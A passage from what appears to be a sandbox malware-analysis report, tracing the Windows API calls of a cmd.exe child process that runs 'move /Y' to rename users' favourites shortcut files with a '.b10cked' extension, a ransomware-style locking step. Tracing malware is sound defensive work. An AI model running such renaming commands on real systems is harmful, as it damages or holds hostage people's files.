returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.423] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.423] GetEnvironmentStringsW () returned 0x390198* [0215.423] FreeEnvironmentStringsW (penv=0x390198) returned 1 [0215.423] GetEnvironmentStringsW () returned 0x390198* [0215.424] FreeEnvironmentStringsW (penv=0x390198) returned 1 [0215.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0xc0, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, 
lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegCloseKey (hKey=0x40) returned 0x0 [0215.424] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed9c | out: phkResult=0x28ed9c*=0x40) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x40, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x1, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, 
lpData=0x28eda8*=0x0, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x4, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x4) returned 0x0 [0215.424] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eda4, lpData=0x28eda8, lpcbData=0x28eda0*=0x1000 | out: lpType=0x28eda4*=0x0, lpData=0x28eda8*=0x9, lpcbData=0x28eda0*=0x1000) returned 0x2 [0215.424] RegCloseKey (hKey=0x40) returned 0x0 [0215.424] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.425] srand (_Seed=0x5b8863b1) [0215.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" [0215.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" [0215.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.425] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.425] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.425] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.425] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.425] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.426] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.426] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.426] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.426] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.426] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.426] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.426] GetEnvironmentStringsW () returned 0x3922e8* [0215.426] FreeEnvironmentStringsW (penv=0x3922e8) returned 1 [0215.426] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.426] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.426] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.426] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.426] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.426] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.426] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.426] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0215.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fb68, lpFilePart=0x28fb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fb64*="Desktop") returned 0x18 [0215.427] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f8e4 | out: lpFindFileData=0x28f8e4) returned 0x390028 [0215.427] FindClose (in: hFindFile=0x390028 | out: hFindFile=0x390028) returned 1 [0215.427] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.428] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.428] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.428] GetEnvironmentStringsW () returned 0x392b08* [0215.428] FreeEnvironmentStringsW (penv=0x392b08) returned 1 [0215.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.428] GetConsoleOutputCP () returned 0x1b5 [0215.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.429] GetUserDefaultLCID () returned 0x409 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.429] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x23, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fca8, cchData=128 | out: lpLCData="0") returned 2 [0215.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fca8, cchData=128 | out: lpLCData="1") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.430] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.431] GetConsoleTitleW (in: lpConsoleTitle=0x3808f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.431] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.432] GetProcAddress 
(hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.432] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.433] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.433] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.433] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.433] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.433] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.433] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.433] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.436] GetConsoleTitleW (in: lpConsoleTitle=0x28f9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.583] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.583] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.583] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.583] _wcsicmp 
(_String1="move", _String2="RMDIR") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.583] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.583] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.585] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.585] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.585] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f75c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f754, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f754*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", 
_MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 
[0215.586] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.586] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.586] _wcsicmp (_String1="MSNMON~1.URL", _String2=".") returned 63 [0215.586] _wcsicmp (_String1="MSNMON~1.URL", _String2="..") returned 63 [0215.586] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnmon~1.url")) returned 0x20 [0215.587] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", nBufferLength=0x104, lpBuffer=0x28f0e4, lpFilePart=0x28f0cc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", lpFilePart=0x28f0cc*="MSNMON~1.URL") returned 0x2f [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.587] _wcsicmp (_String1="MSNMON~1.URL", _String2=".") returned 63 [0215.587] _wcsicmp (_String1="MSNMON~1.URL", _String2="..") returned 63 [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnmon~1.url")) returned 0x20 
[0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", nBufferLength=0x104, lpBuffer=0x28f560, lpFilePart=0x28f2f8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", lpFilePart=0x28f2f8*="MSNMON~1.URL") returned 0x2f [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", nBufferLength=0x104, lpBuffer=0x28f768, lpFilePart=0x28f2f8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", lpFilePart=0x28f2f8*="MSN Money.url.b10cked") returned 0x38 [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] SetLastError (dwErrCode=0x0) [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url.b10cked")) returned 0xffffffff [0215.588] GetLastError () returned 0x2 [0215.588] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", fInfoLevelId=0x1, lpFindFileData=0x28ec74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ec74) returned 0x380eb0 [0215.588] FindNextFileW (in: hFindFile=0x380eb0, lpFindFileData=0x28ec74 | out: lpFindFileData=0x28ec74) returned 0 [0215.588] GetLastError () returned 0x12 [0215.588] FindClose (in: hFindFile=0x380eb0 | out: hFindFile=0x380eb0) returned 1 [0215.589] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", fInfoLevelId=0x1, lpFindFileData=0x391c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c08) returned 0x380eb0 [0215.589] GetFullPathNameW (in: 
lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", nBufferLength=0x104, lpBuffer=0x28ef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", lpFilePart=0x0) returned 0x38 [0215.589] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url", nBufferLength=0x104, lpBuffer=0x28ef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url", lpFilePart=0x0) returned 0x30 [0215.589] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url")) returned 0x20 [0215.589] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url.b10cked"), dwFlags=0x3) returned 1 [0215.590] FindClose (in: hFindFile=0x380eb0 | out: hFindFile=0x380eb0) returned 1 [0215.590] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28eec0 | out: _Buffer=" 1") returned 9 [0215.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.590] GetFileType (hFile=0x7) returned 0x2 [0215.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.590] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ee4c | out: lpMode=0x28ee4c) returned 1 [0215.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ee80 | out: lpConsoleScreenBufferInfo=0x28ee80) returned 1 [0215.591] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.591] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, 
dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28eec0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.591] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28eea4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28eea4*=0x1a) returned 1 [0215.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.592] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.592] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.592] SetConsoleInputExeNameW () returned 0x1 [0215.592] GetConsoleOutputCP () returned 0x1b5 [0215.592] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.592] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.592] exit (_Code=0) Process: id = "537" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" cur_dir = 